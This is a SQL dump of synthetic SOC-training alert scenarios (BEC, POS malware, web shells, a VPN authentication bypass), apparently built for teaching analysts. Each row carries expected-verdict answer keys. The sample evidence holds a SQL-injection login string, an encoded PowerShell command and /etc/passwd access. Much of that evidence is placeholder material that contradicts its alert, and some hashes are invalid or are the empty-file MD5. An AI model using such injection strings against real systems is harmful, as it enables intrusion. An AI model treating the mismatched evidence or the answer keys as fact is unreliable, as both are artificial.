activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is known for suspicious activity, and the user reported unexpected login attempts.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(852, 'BEC Attempt Detected with CEO Impersonation', 'high', 'Proofpoint', 'An email attempting to impersonate the CEO was detected. The email requested a wire transfer to an unfamiliar account.', 'Phishing', 'T1566', 1, 'Closed', 297, '{\"timestamp\":\"2026-01-14T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"195.154.200.25\",\"username\":\"finance@retailcorp.com\",\"hostname\":\"mailserver.retailcorp.com\",\"email_sender\":\"ceo@reta1lcorp.com\",\"email_subject\":\"Urgent: Wire Transfer Request\"}', '2026-01-14 15:31:54', '2026-03-15 11:50:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.154.200.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple BEC attempts\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"ceo@reta1lcorp.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain used for CEO impersonation\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email used a lookalike domain to impersonate the CEO for financial fraud.\"}', 'Beginner', 'CORE', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"BEC Attempt Detected with CEO Impersonation\",\"date\":\"2026-02-01T20:32:22.515Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(853, 'Malware Execution Detected on POS System', 'critical', 'CrowdStrike', 'Suspicious process execution detected on a POS system. The process is associated with known POS malware.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"hostname\":\"pos-terminal-01\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\posmalware.exe\",\"file_hash\":\"3a4b1c2d5e6f7g8h9i0j1k2l3m4n5o6p\"}', '2026-01-14 15:31:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal POS terminal\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\system32\\\\posmalware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known POS malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4b1c2d5e6f7g8h9i0j1k2l3m4n5o6p\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as POS malware variant\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and command line match known POS malware signatures.\"}', 'Beginner', 'EDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(854, 'False Positive: Legitimate QR Code Scanning Detected', 'low', 'IDS', 'A QR code scanning event was detected. The activity was identified as part of a legitimate marketing campaign.', 'Web Request', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-14T13:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.100.100\",\"hostname\":\"qrscanner.retailcorp.com\",\"url\":\"https://marketing.retailcorp.com/qrcampaign\"}', '2026-01-14 15:31:54', '2026-03-05 22:34:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with marketing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://marketing.retailcorp.com/qrcampaign\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as part of a legitimate marketing campaign\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The URL and source IP are associated with a legitimate marketing campaign.\"}', 'Beginner', 'TI', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(855, 'False Positive: Unusual Network Traffic from Internal Server', 'medium', 'Firewall', 'An internal server generated unusual network traffic. Further analysis confirmed this is part of a scheduled data backup.', 'Data Exfil', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.10\",\"dst_ip\":\"10.0.0.20\",\"hostname\":\"backupserver.retailcorp.com\"}', '2026-01-14 15:31:54', '2026-02-26 22:00:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server used for scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal backup destination\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network traffic matched scheduled backup patterns, confirming false positive.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(856, 'Initial Access via VPN Authentication Bypass', 'high', 'SIEM logs from VPN appliances', 'Hafnium exploits authentication bypass vulnerabilities in Pulse Secure, Fortinet, and Citrix VPNs to establish initial access to targeted networks.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"vpn_appliance\":\"Pulse Secure\",\"event_type\":\"authentication_bypass\",\"src_ip\":\"185.92.220.45\",\"internal_ip\":\"192.168.10.22\",\"username\":\"admin\",\"session_id\":\"93fj29fj2\",\"vulnerability_exploited\":\"CVE-2021-22893\",\"file_accessed\":\"/etc/passwd\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Hafnium activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious activity but not conclusively malicious.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"clean\",\"details\":\"Commonly used administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(857, 'Web Shell Deployment for Remote Execution', 'high', 'Web server logs', 'Hafnium has deployed a web shell on a compromised web server to execute commands remotely. This is a typical step used by adversaries to maintain persistence and control over the system.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":512,\"username\":\"webadmin\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP address used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell used for remote execution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(858, 'Establishing Persistence with Web Shells', 'medium', 'File integrity monitoring', 'A web shell was detected on the server, indicating a potential persistence mechanism established by the attacker to maintain long-term access. The presence of unauthorized files suggests a compromise.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"event_time\":\"2023-10-02T14:23:45Z\",\"event_type\":\"file_creation\",\"file_path\":\"/var/www/html/suspicious_shell.php\",\"new_file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"username\":\"webadmin\",\"action\":\"create\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"/var/www/html/suspicious_shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known web shell used for post-exploitation.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious web shell activity.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Common administrative username.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, 